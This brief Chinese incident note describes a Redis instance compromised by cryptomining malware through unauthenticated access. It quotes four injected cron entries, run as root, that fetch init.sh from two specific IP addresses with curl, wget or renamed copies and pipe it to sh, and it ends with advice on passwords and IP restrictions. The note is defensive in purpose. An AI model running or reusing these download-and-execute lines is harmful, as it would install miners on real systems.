1.问题
开启redis的监控功能
发现有flushall命令
同时设置了4个backup
4个backup对应的value值如下
*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh
*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh
*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh
*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh\
2.病毒说明
这是一种Redis扩散病毒,专门利用Redis未授权访问漏洞的挖矿病毒
3.预防措施
设置密码
限制ip访问